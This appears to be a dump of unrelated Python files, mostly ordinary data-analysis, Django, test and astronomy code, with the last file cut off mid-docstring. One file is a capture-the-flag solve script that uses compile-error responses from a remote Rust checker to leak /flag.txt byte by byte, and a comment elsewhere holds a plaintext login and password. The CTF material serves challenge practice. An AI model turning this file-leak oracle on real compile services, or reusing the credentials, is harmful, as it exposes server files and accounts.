print(gapi.create(description, data, public))
return
|
#part1
# Merge the ridership and cal tables
ridership_cal = ridership.merge(cal, on=['year','month','day'])
#part2
# Merge the ridership, cal, and stations tables
ridership_cal_stations = ridership.merge(cal, on=['year','month','day']) \
.merge(stations,on=['station_id'])
#part3
# Merge the ridership, cal, and stations tables
ridership_cal_stations = ridership.merge(cal, on=['year','month','day']) \
.merge(stations, on='station_id')
# Create a filter to filter ridership_cal_stations
filter_criteria = ((ridership_cal_stations['month'] == 7)
& (ridership_cal_stations['day_type'] == 'Weekday')
& (ridership_cal_stations['station_name'] == 'Wilson'))
# Use .loc and the filter to select for rides
print(ridership_cal_stations.loc[filter_criteria, 'rides'].sum())
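#toy example
# A minimal, self-contained sketch of the same pattern on made-up data (all
# frames and values below are illustrative): a chained multi-key merge followed
# by a boolean filter applied with .loc.
import pandas as pd
toy_ridership = pd.DataFrame({
    "station_id": [1, 1, 2],
    "year": [2019, 2019, 2019],
    "month": [7, 7, 7],
    "day": [1, 2, 1],
    "rides": [100, 150, 80],
})
toy_cal = pd.DataFrame({
    "year": [2019, 2019],
    "month": [7, 7],
    "day": [1, 2],
    "day_type": ["Weekday", "Weekday"],
})
toy_stations = pd.DataFrame({
    "station_id": [1, 2],
    "station_name": ["Wilson", "Clark"],
})
toy_merged = toy_ridership.merge(toy_cal, on=["year", "month", "day"]) \
                          .merge(toy_stations, on="station_id")
toy_filter = ((toy_merged["month"] == 7)
              & (toy_merged["day_type"] == "Weekday")
              & (toy_merged["station_name"] == "Wilson"))
print(toy_merged.loc[toy_filter, "rides"].sum())  # 250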
|
#testing.py
#login = 'westcoastautos'
#password = '1qazxsw2'
from opensourcebotsfuckyeah import *
def input_master(inputFileName):
if '.txt' not in inputFileName:
inputFileName += '.txt'
return inputFileName
inputFileName = input("Enter the name of the .txt file containing hashtags to search for: ")
inputFileName = input_master(inputFileName)
inputTagList = hashtags_list_form(inputFileName)
inputFileBlackList = input("Enter the name of the .txt file containing hashtags to avoid: ")
inputFileBlackList = input_master(inputFileBlackList)
inputTagBlackList = hashtags_list_form(inputFileBlackList)
|
from django.conf.urls import patterns
from rboard_bugzilla.extension import BugzillaExtension
from rboard_bugzilla.forms import BugzillaSiteForm
urlpatterns = patterns('',
(r'^$', 'reviewboard.extensions.views.configure_extension',
{'ext_class': BugzillaExtension,
'form_class': BugzillaSiteForm,
}),
)
|
# Generated by Django 2.1 on 2018-08-24 16:49
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('api', '0003_auto_20180822_1457'),
]
operations = [
migrations.CreateModel(
name='Cellar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('purchase_date', models.DateField()),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cellar', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('owner', 'purchase_date'),
},
),
migrations.RemoveField(
model_name='winery',
name='region',
),
migrations.AlterField(
model_name='wine',
name='winery',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='cellar',
name='wine',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Wine'),
),
]
|
# Lists More Advanced
# Loops and lists
inMyBag = ['pen' , 'book' , 'sandwich' , 'rope']
for i in range(len(inMyBag)):
print('Index no. ' + str(i) + ' holds a ' + inMyBag[i]) # Everything in my bag
# The in/not in operators
print('There is a pen in my bag: ' + str('pen' in inMyBag)) # True
print('There is a cat in my bag: ' + str('cat' in inMyBag)) # False
print()
print('#####Check Yo Bag!#####')
print()
print('Enter an item or type stop to stop ')
while True:
check = input()
if check == 'stop':
break
elif check not in inMyBag:
print(check + ', that is not in my bag!')
else:
print(check + ', that is in my bag!')
# Augmented Assignment of lists
dupesInMyBag = inMyBag * 3
print(dupesInMyBag) # Three times the stuff in my bag!
# Finding values in a list
print(dupesInMyBag.index('pen')) # Shows first occurrence of pen in the list (0)
# Adding values to your list
inMyBag.append('tortelini') # Adds tortelini to the end of the list
print(inMyBag)
inMyBag.insert(2, 'coffee') # Adds coffee to index number 2
print(inMyBag)
# Removing values from the list
inMyBag.remove('pen') # Remove the pen value from the list
print(inMyBag)
# Sorting values in a list
myGrades = [8, 2, 4, 6]
myGrades.sort()
print(myGrades) # Sorted numbers ascending
inMyBag.sort()
print(inMyBag) # Sorted strings alphabetically ascending
inMyBag.sort(reverse=True)
print(inMyBag) # Sorted strings alphabetically descending
|
from abc import ABCMeta, abstractmethod
from pyppeteer import launch
import requests
from pypp_cookie import get_cookies
class CookiesGetter(metaclass=ABCMeta):
def __init__(self,uid:str,password:str,page=None) -> None:
self.page = page
self.username = uid
self.password = password
@abstractmethod
def Read(self):
pass
class Cookies(CookiesGetter):
def post_(self):
data = {
'username': self.username,
'password': self.password
}
response = requests.post('https://newsso.shu.edu.cn/login/eyJ0aW1lc3RhbXAiOjE2MTg5OTUyNzg0ODkwMzA1MjYsInJlc3BvbnNlVHlwZSI6ImNvZGUiLCJjbGllbnRJZCI6IldVSFdmcm50bldZSFpmelE1UXZYVUNWeSIsInNjb3BlIjoiMSIsInJlZGlyZWN0VXJpIjoiaHR0cHM6Ly9zZWxmcmVwb3J0LnNodS5lZHUuY24vTG9naW5TU08uYXNweD9SZXR1cm5Vcmw9JTJmRGVmYXVsdC5hc3B4Iiwic3RhdGUiOiIifQ==', data=data)
for each in response.history:
for k, v in each.cookies.items():
if k == '.ncov2019selfreport':
return f'{k}={v}'
return None
async def Read(self):
await self.get_key_()
if not isinstance(self.password,str) or len(self.password) < 20:
return 'erropw'
cookies = self.post_()
if not cookies:
return 'nocookie'
return cookies
@staticmethod
def read_js(path) -> str:
with open(path, 'r', encoding='utf-8') as f:
return f.read()
async def get_key_(self):
# page = await open_browser()
key_file_path = '/Users/tomjack/Desktop/code/Python/SHU_report_public/js_test/jiami.js'
key_js = self.read_js(key_file_path)
key_js += f'\ntest("{self.password}")'
key_value = await self.page.evaluate(key_js)
self.password = key_value
async def open_browser(self):
"""
Open the browser obj
:return : Page
:rtype : pyppeteer.Page
"""
if self.page:
return
browser = await launch({'headless': True, 'args': ['--disable-infobars', '--window-size=1920,1080', '--no-sandbox']})
        # Open a new page
page = await browser.newPage()
        await page.setViewport({'width': 1920, 'height': 1080})  # set the page size
self.page = page
return page
    async def test_single(self):
        print(self.password)
        await self.open_browser()
        await self.get_key_()
        if not isinstance(self.password, str):
            return
        return self.post_()
class CookiesPpeteer(CookiesGetter):
async def Read(self):
cookies = await get_cookies(self.page,self.username,self.password)
if not cookies:
return 'nocookie'
return cookies
if __name__ == '__main__':
cookies: str = get_cookies(None,"", "")
print(cookies)
# print(getUrl())
|
import os
import time
from .constraint import DenialConstraint
class Parser:
"""
    This class creates an interface for parsing denial constraints
"""
def __init__(self, env, dataset):
"""
        Constructs the parser interface object
        :param env: environment/configuration dictionary
        :param dataset: dataset object providing the attributes referenced by the DCs
"""
self.env = env
self.ds = dataset
self.dc_strings = []
self.dcs = {}
def load_denial_constraints(self, f_path, f_name):
"""
Loads denial constraints from line-separated txt file
        :param f_path: path to the directory containing the DC file
        :param f_name: name of the DC file
        :return: status string and the elapsed loading time in seconds
"""
        tic = time.perf_counter()
if not self.ds.raw_data:
status = 'NO dataset specified'
            toc = time.perf_counter()
return status, toc - tic
attrs = self.ds.raw_data.get_attributes()
try:
dc_file = open(os.path.join(f_path,f_name), 'r')
status = "OPENED constraints file successfully"
if self.env['verbose']:
print (status)
for line in dc_file:
if not line.isspace():
line = line.rstrip()
self.dc_strings.append(line)
self.dcs[line] = (DenialConstraint(line,attrs,self.env['verbose']))
status = 'DONE Loading DCs from ' + f_name
except Exception as e:
status = ' '.join(['For file:', f_name, str(e)])
        toc = time.perf_counter()
return status, toc - tic
def get_dcs(self):
return self.dcs
|
def raiseExceptionDoNotCatch():
try:
print("In raiseExceptionDoNotCatch")
raise Exception
finally:
print("Finally executed in raiseExceptionDoNotCatch")
print("Will never reach this point")
print("\nCalling raiseExceptionDoNotCatch")
try:
raiseExceptionDoNotCatch()
except Exception:
print("Caught exception from raiseExceptionDoNotCatch in main program.")
|
from strategy.rebalance import get_relative_to_expiry_rebalance_dates, \
get_fixed_frequency_rebalance_dates, \
get_relative_to_expiry_instrument_weights
from strategy.calendar import get_mtm_dates
import pandas as pd
import pytest
from pandas.util.testing import assert_index_equal, assert_frame_equal
def assert_dict_of_frames(dict1, dict2):
assert dict1.keys() == dict2.keys()
for key in dict1:
assert_frame_equal(dict1[key], dict2[key], check_names=False)
def test_tradeables_dates():
    # no CME holidays in this date range
sd = pd.Timestamp("2015-01-02")
ed = pd.Timestamp("2015-03-23")
exchanges = ["CME"]
tradeable_dates = get_mtm_dates(sd, ed, exchanges)
exp_tradeable_dates = pd.date_range(
"2015-01-02", "2015-03-23", freq="B"
)
assert_index_equal(tradeable_dates, exp_tradeable_dates)
# with an adhoc holiday
holidays = [pd.Timestamp("2015-01-02")]
tradeable_dates = get_mtm_dates(sd, ed, exchanges, holidays=holidays)
exp_tradeable_dates = pd.date_range(
"2015-01-03", "2015-03-23", freq="B"
)
assert_index_equal(tradeable_dates, exp_tradeable_dates)
# with CME holiday (New Years day)
sd = pd.Timestamp("2015-01-01")
ed = pd.Timestamp("2015-01-02")
tradeable_dates = get_mtm_dates(sd, ed, exchanges)
exp_tradeable_dates = pd.DatetimeIndex([pd.Timestamp("2015-01-02")])
assert_index_equal(tradeable_dates, exp_tradeable_dates)
def test_relative_to_expiry_rebalance_dates():
# each contract rolling individually, same offset
# change to ES and TY
sd = pd.Timestamp("2015-01-02")
ed = pd.Timestamp("2015-03-23")
expiries = pd.DataFrame(
[["2015ESH", "2015-03-20", "2015-03-20"],
["2015ESM", "2015-06-19", "2015-06-19"],
["2015TYH", "2015-02-27", "2015-03-20"],
["2015TYM", "2015-05-29", "2015-06-19"]],
columns=["contract", "first_notice", "last_trade"]
)
offsets = -3
rebal_dates = get_relative_to_expiry_rebalance_dates(
sd, ed, expiries, offsets, all_monthly=False, holidays=None
)
exp_rebal_dates = pd.DatetimeIndex(
["2015-01-02", "2015-02-24", "2015-03-17"]
)
assert_index_equal(rebal_dates, exp_rebal_dates)
# rolling all monthly contracts together, same offset
rebal_dates = get_relative_to_expiry_rebalance_dates(
sd, ed, expiries, offsets, all_monthly=True, holidays=None
)
exp_rebal_dates = pd.DatetimeIndex(["2015-01-02", "2015-02-24"])
assert_index_equal(rebal_dates, exp_rebal_dates)
# rolling each contract individually, different offset
offsets = {"ES": -3, "TY": -4}
rebal_dates = get_relative_to_expiry_rebalance_dates(
sd, ed, expiries, offsets, all_monthly=False, holidays=None
)
exp_rebal_dates = pd.DatetimeIndex(
["2015-01-02", "2015-02-23", "2015-03-17"]
)
assert_index_equal(rebal_dates, exp_rebal_dates)
def test_relative_to_expiry_weights():
expiries = pd.DataFrame(
[["2015ESH", "2015-03-20", "2015-03-20"],
["2015ESM", "2015-06-19", "2015-06-19"],
["2015ESU", "2015-09-18", "2015-09-18"],
["2015TYH", "2015-03-16", "2015-03-20"],
["2015TYM", "2015-05-29", "2015-06-19"],
["2015TYU", "2015-08-31", "2015-09-21"]],
columns=["contract", "first_notice", "last_trade"]
)
# one generic and one product
dts = pd.date_range("2015-03-17", "2015-03-18", freq="B")
offsets = -3
root_gnrcs = {"ES": ["ES1"]}
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets
)
exp_wts = {
"ES": pd.DataFrame(
[1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-17"), "2015ESH"),
(pd.Timestamp("2015-03-18"), "2015ESM")],
names=("date", "contract")),
columns=["ES1"]
)
}
assert_dict_of_frames(wts, exp_wts)
# multiple products
dts = pd.date_range("2015-03-13", "2015-03-20", freq="B")
offsets = -1
root_gnrcs = {"ES": ["ES1"], "TY": ["TY1"]}
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets
)
exp_wts = {
"ES": pd.DataFrame([1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015ESH"),
(pd.Timestamp("2015-03-16"), "2015ESH"),
(pd.Timestamp("2015-03-17"), "2015ESH"),
(pd.Timestamp("2015-03-18"), "2015ESH"),
(pd.Timestamp("2015-03-19"), "2015ESH"),
(pd.Timestamp("2015-03-20"), "2015ESM"),],
names=("date", "contract")),
columns=["ES1"]
),
"TY": pd.DataFrame([1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015TYH"),
(pd.Timestamp("2015-03-16"), "2015TYM"),
(pd.Timestamp("2015-03-17"), "2015TYM"),
(pd.Timestamp("2015-03-18"), "2015TYM"),
(pd.Timestamp("2015-03-19"), "2015TYM"),
(pd.Timestamp("2015-03-20"), "2015TYM"),],
names=("date", "contract")),
columns=["TY1"]
)
}
assert_dict_of_frames(wts, exp_wts)
# multiple generics
offsets = -1
dts = pd.date_range("2015-03-19", "2015-03-20", freq="B")
root_gnrcs = {"ES": ["ES1", "ES2"]}
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets
)
exp_wts = {
"ES": pd.DataFrame([[1.0, 0.0], [0.0, 1.0], [1.0, 0.0], [0.0, 1.0]],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-19"), "2015ESH"),
(pd.Timestamp("2015-03-19"), "2015ESM"),
(pd.Timestamp("2015-03-20"), "2015ESM"),
(pd.Timestamp("2015-03-20"), "2015ESU")],
names=("date", "contract")),
columns=["ES1", "ES2"]
)
}
assert_dict_of_frames(wts, exp_wts)
# with dict of offsets
offsets = {"ES": -4, "TY": -1}
root_gnrcs = {"ES": ["ES1"], "TY": ["TY1"]}
dts = pd.date_range("2015-03-13", "2015-03-17", freq="B")
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets
)
exp_wts = {
"ES": pd.DataFrame([1.0, 1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015ESH"),
(pd.Timestamp("2015-03-16"), "2015ESH"),
(pd.Timestamp("2015-03-17"), "2015ESM")],
names=("date", "contract")),
columns=["ES1"]
),
"TY": pd.DataFrame([1.0, 1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015TYH"),
(pd.Timestamp("2015-03-16"), "2015TYM"),
(pd.Timestamp("2015-03-17"), "2015TYM")],
names=("date", "contract")),
columns=["TY1"]
)
}
assert_dict_of_frames(wts, exp_wts)
# with holidays for relative roll
offsets = -1
root_gnrcs = {"ES": ["ES1"]}
holidays = [pd.Timestamp("2015-03-19").date()]
dts = pd.date_range("2015-03-18", "2015-03-19", freq="B")
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets, holidays=holidays
)
exp_wts = {
"ES": pd.DataFrame([1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-18"), "2015ESH"),
(pd.Timestamp("2015-03-19"), "2015ESM")],
names=("date", "contract")),
columns=["ES1"]
)
}
assert_dict_of_frames(wts, exp_wts)
# with monthly flag
dts = pd.date_range("2015-03-13", "2015-03-16", freq="B")
root_gnrcs = {"ES": ["ES1"], "TY": ["TY1"]}
offsets = -1
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets, all_monthly=True
)
exp_wts = {
"ES": pd.DataFrame([1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015ESH"),
(pd.Timestamp("2015-03-16"), "2015ESM")],
names=("date", "contract")),
columns=["ES1"]
),
"TY": pd.DataFrame([1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015TYH"),
(pd.Timestamp("2015-03-16"), "2015TYM")],
names=("date", "contract")),
columns=["TY1"]
)
}
assert_dict_of_frames(wts, exp_wts)
def test_fixed_frequency_rebalance_dates():
sd = pd.Timestamp("2015-01-17")
ed = pd.Timestamp("2015-01-28")
freq = "monthly"
offset = -3
dts = get_fixed_frequency_rebalance_dates(sd, ed, freq, offset)
exp_dts = pd.DatetimeIndex(["2015-01-17", "2015-01-28"])
assert_index_equal(dts, exp_dts)
ed = pd.Timestamp("2015-02-28")
dts = get_fixed_frequency_rebalance_dates(sd, ed, freq, offset)
exp_dts = pd.DatetimeIndex(["2015-01-17", "2015-01-28", "2015-02-25"])
assert_index_equal(dts, exp_dts)
offset = [-3, -1]
ed = pd.Timestamp("2015-01-30")
dts = get_fixed_frequency_rebalance_dates(sd, ed, freq, offset)
exp_dts = pd.DatetimeIndex(["2015-01-17", "2015-01-28", "2015-01-30"])
assert_index_equal(dts, exp_dts)
sd = pd.Timestamp("2015-01-02")
ed = pd.Timestamp("2015-01-13")
freq = "weekly"
offset = [0, 2]
dts = get_fixed_frequency_rebalance_dates(sd, ed, freq, offset)
exp_dts = pd.DatetimeIndex(["2015-01-02", "2015-01-05", "2015-01-07",
"2015-01-12"])
assert_index_equal(dts, exp_dts)
|
#!/usr/bin/env python3.8
import json
import string
import sys
import urllib.request
url_base = "http://challenges2.france-cybersecurity-challenge.fr:6005/check"
COMPILE_SUCCESS = '{"result":0}'
COMPILE_FAILURE = '{"result":1}'
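# Probe the flag length with a compile-time oracle: include_bytes!("/flag.txt")
# yields a &[u8; N] whose length must match the type annotation exactly, so the
# submitted snippet compiles only when `size` equals the byte length of
# /flag.txt; keep incrementing until the remote compiler accepts it.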
def get_size() -> int:
size = 0
while 1:
data = {"content":"let my_string : &[u8; "+str(size)+"] = include_bytes!(\"/flag.txt\");"}
jsonbytes = json.dumps(data).encode()
req = urllib.request.Request(url_base)
req.add_header('Content-Type', 'application/json')
req.add_header('Content-Length', len(jsonbytes))
response = urllib.request.urlopen(req, jsonbytes)
html = response.read().decode()
print(f"size={size}\r", end='')
if COMPILE_SUCCESS in html:
print()
return size
elif COMPILE_FAILURE in html:
size += 1
else:
print(html)
exit()
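# Recover the flag byte by byte with a second compile-time oracle: the const
# expression divides by (flag_byte - candidate), and const evaluation of a
# division by zero is rejected by the compiler, so a compile failure means the
# candidate character matches the flag byte at index i.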
def get_flag(size: int) -> str:
flag = ""
for i in range(size-1):
for c in string.printable:
data = {"content": "const VALUE: i8 = 1 / (include_bytes!(\"/flag.txt\")["+str(i)+"] as i8 - b'"+c+"' as i8);"}
jsonbytes = json.dumps(data).encode()
req = urllib.request.Request(url_base)
req.add_header('Content-Type', 'application/json')
req.add_header('Content-Length', len(jsonbytes))
response = urllib.request.urlopen(req, jsonbytes)
html = response.read().decode()
print(f"flag={flag}{c}\r", end='')
if COMPILE_SUCCESS in html:
continue
elif COMPILE_FAILURE in html:
flag += c
break
else:
print(html)
exit()
print()
return flag
size = get_size()
print(f"size={size}")
size = 71
flag = get_flag(size)
print(f"flag={flag}")
|
#!/home/sonic/anaconda3/envs/astroconda/bin/python
# -*- coding: utf-8 -*-
#============================================================
# IMSNG MONITORING NEW TRANSIENT WITH TNS QUERY CODE
# 2017.09.14 CREATED BY Nikola Knezevic
# 2019.08.06 MODIFIED BY Gregory S.H. Paek
# 2019.08.07 MODIFIED BY Gregory S.H. Paek
# 2020.03.18 MODIFIED BY Gregory S.H. Paek
#============================================================
import os, glob
import numpy as np
import time, datetime
from astropy.io import ascii, fits
from astropy.coordinates import SkyCoord
from astropy.time import Time
import astropy.units as u
import requests
import json
from collections import OrderedDict
from astropy.table import Table, vstack, Column, MaskedColumn
############################# PARAMETERS #############################
# API key for Bot #
# GET KEY FROM PERSONAL TABLE
path_keys = '/home/sonic/Research/table/keys.dat'
keytbl = ascii.read(path_keys)
api_key = np.asscalar(keytbl['key'][keytbl['name']=='TNS']) #
# list that represents json file for search obj #
search_obj=[("ra",""), ("dec",""), ("radius",""), ("units",""), #
("objname",""), ("internal_name","")] #
# list that represents json file for get obj #
get_obj=[("objname",""), ("photometry","0"), ("spectra","1")] #
######################################################################
############################# URL-s #############################
# url of TNS and TNS-sandbox api #
url_tns_api="https://wis-tns.weizmann.ac.il/api/get" #
url_tns_sandbox_api="https://sandbox-tns.weizmann.ac.il/api/get" #
######################################################################
############################# DIRECTORIES ############################
# current working directory #
cwd=os.getcwd() #
# directory for downloaded files #
download_dir=os.path.join(cwd,'downloaded_files') #
######################################################################
########################## API FUNCTIONS #############################
# function for changing data to json format #
def format_to_json(source): #
# change data to json format and return #
parsed=json.loads(source,object_pairs_hook=OrderedDict) #
result=json.dumps(parsed,indent=4) #
return result #
#--------------------------------------------------------------------#
# function for search obj #
def search(url,json_list): #
try: #
# url for search obj #
search_url=url+'/search' #
# change json_list to json format #
json_file=OrderedDict(json_list) #
# construct the list of (key,value) pairs #
search_data=[('api_key',(None, api_key)), #
('data',(None,json.dumps(json_file)))] #
# search obj using request module #
response=requests.post(search_url, files=search_data) #
# return response #
return response #
except Exception as e: #
return [None,'Error message : \n'+str(e)] #
#--------------------------------------------------------------------#
# function for get obj #
def get(url,json_list): #
try: #
# url for get obj #
get_url=url+'/object' #
# change json_list to json format #
json_file=OrderedDict(json_list) #
# construct the list of (key,value) pairs #
get_data=[('api_key',(None, api_key)), #
('data',(None,json.dumps(json_file)))] #
# get obj using request module #
response=requests.post(get_url, files=get_data) #
# return response #
return response #
except Exception as e: #
return [None,'Error message : \n'+str(e)] #
#--------------------------------------------------------------------#
# function for downloading file #
def get_file(url): #
try: #
# take filename #
filename=os.path.basename(url) #
# downloading file using request module #
response=requests.post(url, files=[('api_key',(None, api_key))], #
stream=True) #
# saving file #
path=os.path.join(download_dir,filename) #
if response.status_code == 200: #
with open(path, 'wb') as f: #
for chunk in response: #
f.write(chunk) #
print ('File : '+filename+' is successfully downloaded.') #
else: #
print ('File : '+filename+' was not downloaded.') #
print ('Please check what went wrong.') #
except Exception as e: #
print ('Error message : \n'+str(e)) #
######################################################################
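#--------------------------------------------------------------------#
# Hedged usage sketch (added for illustration, not called anywhere):
# a plain cone search against the sandbox API using the helpers above.
# The coordinates and radius below are made-up example values.
def tns_cone_search_demo(ra='10:00:00', dec='+20:00:00', radius='5'):
	demo_search_obj = [("ra", ra), ("dec", dec), ("radius", radius), ("units", "arcmin"), ("objname", ""), ("internal_name", "")]
	response = search(url_tns_sandbox_api, demo_search_obj)
	if None not in response:
		return json.loads(format_to_json(response.text))['data']['reply']
	print(response[1])
	return []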
#============================================================#
# FUNCTION FOR ROUTINE
#============================================================#
def search_transient_routine(inim, url_tns_sandbox_api="https://sandbox-tns.weizmann.ac.il/api/get"):
obs = inim.split('-')[1]
# obs = 'KMTNET'
hdr = fits.getheader(inim)
dateobs = hdr['DATE-OBS']
t = Time(dateobs, format='isot')
jd = t.jd
mjd = t.mjd
radeg, dedeg = hdr['CRVAL1'], hdr['CRVAL2']
c = SkyCoord(radeg, dedeg, unit='deg')
radec = c.to_string('hmsdms', sep=':')
ra, dec = radec.split(' ')[0], radec.split(' ')[1]
	radius = obstbl[obstbl['obs'] == obs]['fov'].item()/2 # ['], [arcmin]; .item() replaces the removed np.asscalar
units = 'arcmin'
#------------------------------------------------------------
# SEARCH OBJECT
#------------------------------------------------------------
search_obj=[("ra",ra), ("dec",dec), ("radius",radius), ("units",units),
("objname",""), ("internal_name","")]
response=search(url_tns_sandbox_api,search_obj)
tnames = []
if None not in response:
json_data =format_to_json(response.text)
json_dict = json.loads(json_data)
if len(json_dict['data']['reply']) != 0:
transients = ''
for i in range(len(json_dict['data']['reply'])):
tname = json_dict['data']['reply'][i]['prefix']+'_'+json_dict['data']['reply'][i]['objname']
tnames.append(tname)
transients = transients+tname+','
transients = transients[:-1]
else:
transients = 'None'
else:
transients = 'None'
print(response[1])
#------------------------------------------------------------
inimtbl = Table( [[inim], [round(radeg, 5)], [round(dedeg, 3)], [ra], [dec], [dateobs], [round(jd, 5)], [round(mjd, 5)], [transients]],
names=('image', 'radeg', 'dedeg', 'ra', 'dec', 'dateobs', 'jd', 'mjd', 'transients'))
return inimtbl
#------------------------------------------------------------
def query_transient_routine_simple(qname, field, c, url_tns_sandbox_api="https://sandbox-tns.weizmann.ac.il/api/get", photometry='1', spectra='1'):
get_obj = [("objname", qname), ("photometry", photometry), ("spectra", spectra)]
response = get(url_tns_sandbox_api, get_obj)
#------------------------------------------------------------
if None not in response:
rows = [field]
cols = ['field']
json_data=format_to_json(response.text)
json_dict_targ = json.loads(json_data)
#------------------------------------------------------------
# EXTRACT INFORMATION
#------------------------------------------------------------
tc = SkyCoord(json_dict_targ['data']['reply']['ra'],
json_dict_targ['data']['reply']['dec'], unit=(u.hourangle, u.deg))
for key in ['objname', 'hostname', 'discoverydate','discoverymag', 'discmagfilter', 'internal_name', 'ra', 'radeg', 'dec', 'decdeg', 'object_type']:
if key == 'discmagfilter':
val = json_dict_targ['data']['reply'][key]['name']
elif key == 'object_type':
val = json_dict_targ['data']['reply'][key]['name']
else:
val = json_dict_targ['data']['reply'][key]
rows.append(val)
cols.append(key)
try:
rows.append(round(c.separation(tc).arcminute, 3))
except:
rows.append(-99)
cols.append('sep_arcmin')
#------------------------------------------------------------
rows = tuple(rows)
cols = tuple(cols)
return rows
else:
print (response[1])
return response[1]
#------------------------------------------------------------
def getCurrentStrTime():
return time.strftime("%Y%m%d-%H%M%S")
#============================================================#
# MAIN BODY
#============================================================#
starttime = time.time()
now = datetime.datetime.now()
print('# {}/{}/{} {}:{}:{}'.format(now.year, now.month, now.day, now.hour, now.minute, now.second))
outname = 'IMSNG-TNS-{}.dat'.format(getCurrentStrTime())
#------------------------------------------------------------
path_obs = '/home/sonic/Research/table/obs.txt'
path_input = '/home/sonic/Research/table/imsng-alltarget.dat'
path_key = '/home/sonic/Research/table/keys.dat'
path_save = '/data1/IMSNG'
refcats = glob.glob('/data1/IMSNG/IMSNG-TNS*.dat')
refcats.sort()
path_ref = refcats[-1]
#------------------------------------------------------------
obstbl = ascii.read(path_obs)
reftbl = ascii.read(path_ref)
intbl = ascii.read(path_input)
keytbl = ascii.read(path_key)
#------------------------------------------------------------
radius = 15
units = 'arcmin'
#------------------------------------------------------------
cols = ('field',
'objname',
'hostname',
'discoverydate',
'discoverymag',
'discmagfilter',
'internal_name',
'ra',
'radeg',
'dec',
'decdeg',
'object_type',
'sep_arcmin')
#------------------------------------------------------------
tblist = []
rowlist = []
for i in range(len(intbl)):
obj = intbl['obj'][i]
ra, dec = intbl['ra'][i], intbl['dec'][i]
c = SkyCoord(ra, dec, unit=(u.hourangle, u.deg))
# print('PROCESS\t{}\t[{}/{}]'.format(obj, i+1, len(intbl)))
search_obj = [("ra",ra), ("dec",dec), ("radius",radius), ("units",units),
("objname",""), ("internal_name","")]
response = search(url_tns_sandbox_api,search_obj)
tnames = []
if None not in response:
json_data = format_to_json(response.text)
json_dict = json.loads(json_data)
if len(json_dict['data']['reply']) != 0:
transients = ''
			for j in range(len(json_dict['data']['reply'])):
				tname = json_dict['data']['reply'][j]['objname']
tnames.append(tname)
transients = transients+tname+','
transients = transients[:-1]
else:
transients = 'None'
else:
transients = 'None'
print(response[1])
for qname in tnames:
# onetbl = query_transient_routine_simple(qname)
# onetbl['imsng'] = intbl['obj'][i]
# tblist.append(onetbl)
onerows = query_transient_routine_simple(qname, field=obj, c=c)
rowlist.append(onerows)
comtbl = Table(rows=rowlist, names=cols)
#------------------------------------------------------------
# CHECK NEW TRANSIENTs
#------------------------------------------------------------
newlist = []
for i, objname in enumerate(comtbl['objname']):
if objname not in reftbl['objname']:
newlist.append(comtbl[i])
if len(newlist) == 0:
	print('THERE IS NO NEW ONE.')
else:
	print('NEW TRANSIENT REPORTED. SENDING E-MAIL TO STAFF...')
#------------------------------------------------------------
# SAVE TABLEs
#------------------------------------------------------------
comtbl.write(path_save+'/'+outname, format='ascii', overwrite=True)
# ascii.write(comtbl, path_save+'/'+outname, format='fixed_width_two_line')
if len(newlist) > 0:
	newtbl = vstack(newlist)
	# newtbl.write(path_save+'/NEW-'+outname, format='ascii', overwrite=True)
	# ascii.write(newtbl, path_save+'/NEW-'+outname, format='fixed_width_two_line')
	ascii.write(newtbl, path_save+'/NEW-'+outname, format='ascii')
else:
	# no new transients: comtbl is already saved above, so stop here instead of crashing on vstack([])
	raise SystemExit(0)
#------------------------------------------------------------
# MAIL SETTING
#------------------------------------------------------------
reciver = ascii.read('/home/sonic/Research/table/imsng-mail-reciver.txt')
subject = '[IMSNG] {} NEW TRANSIENTs'.format(getCurrentStrTime())
# contents= 'CONTENTS'
import codecs
contents= codecs.open(path_save+'/NEW-'+outname, 'rb', 'utf-8')
indx = np.where(keytbl['name']=='ceouobs')
fromID, fromPW = keytbl['key'][indx].item(), keytbl['pw'][indx].item()
toIDs = ''
for address in reciver['address']: toIDs += address+','
toIDs = toIDs[:-1]
# toIDs = "gregorypaek94@gmail.com"
# ccIDs = 'gundam_psh@naver.com'
import glob
# path = glob.glob(save_path+'/'+eventname+'-*.txt')
import os
import smtplib
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.header import Header
#msg = MIMEBase('mixed')
#msg = MIMEText(contents, 'plain', 'utf-8')
msg = MIMEMultipart()
msg['Subject'] = Header(s=subject, charset="utf-8")
msg['From'] = fromID
msg['To'] = toIDs
msg.attach(MIMEText(contents.read()))
'''
# ATTACH TEXT FILE ON MAIL
if path != None:
if type(path) != list:
filelist = []
filelist.append(path)
else:
